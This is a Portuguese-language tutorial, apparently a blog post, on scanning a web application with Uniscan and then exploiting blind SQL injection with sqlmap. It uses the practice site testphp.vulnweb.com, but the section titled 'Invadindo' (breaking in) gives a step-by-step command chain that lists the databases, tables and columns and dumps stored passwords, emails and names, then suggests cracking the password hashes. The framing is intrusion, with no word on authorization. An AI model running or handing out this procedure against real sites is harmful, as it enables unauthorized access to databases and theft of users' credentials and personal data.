O que é SQL?
SQL é uma linguagem de programação utilizada para manipular informações em bancos de dados.

Com o SQL é possível formular comandos (queries) para buscar informações no banco de dados, adicionar registros, criar e alterar tabelas, etc.

E o Uniscan?
O Uniscan é um scanner de vulnerabilidade para aplicações Web.

Ok agora vamos para o Tutorial.

###############Escaneando vulnerabilidades###############

Site utilizado no tutorial:http://testphp.vulnweb.com/

Abra o terminal e digite… para mostrar os comandos:

uniscan –h ou –help

Para escanear algum site digite:

uniscan -u <Url do site> -qweds

Lembrando que vc pode usar qualquer opção que desejar, esse é a padrão(-qweds) e quanto o (-u), usa-se esse comando antes de colocar alguma Url.

Espere terminar o scan terminar e procure “Blind SQL Injection”

Copie um link que tenha “Vul [Blind SQL-i]”

Coloque uma aspas simples no final do link (‘). Se aparecer um erro parecido com esse… é que esse link+variável esta vulnerável

###############Invadindo###############

Abra outro terminal e digite:

sqlmap -u <Link+Variavel> –dbs

Procure “available databases [#]:”, no meu caso seria (acuart). Agora vamos abrir as tabelas digitando:

sqlmap -u (Link+Variavel) -D <Database> –tables

Ira aparecer algumas tabelas, caso vc queria pegar outras coisas sem ser senhas,emails,nomes etc. Digite a seguir o que desejar. Vamos abrir as colunas:

sqlmap -u (Link+Variavel) -D <Database> -T <Tabela da Database> –columns

Pronto agora é so digitar as colunas do database que desejar…

sqlmap -u (Link+Variavel) -D <Database> -T <Tabela da Database> -C ‘<Coluna do Database>’ –dump

E pronto, vc ja tem o que queria. As vezes as senhas não ficam do jeito da imagem(abaixo),
vc tera que descriptografar elas.

=========================================================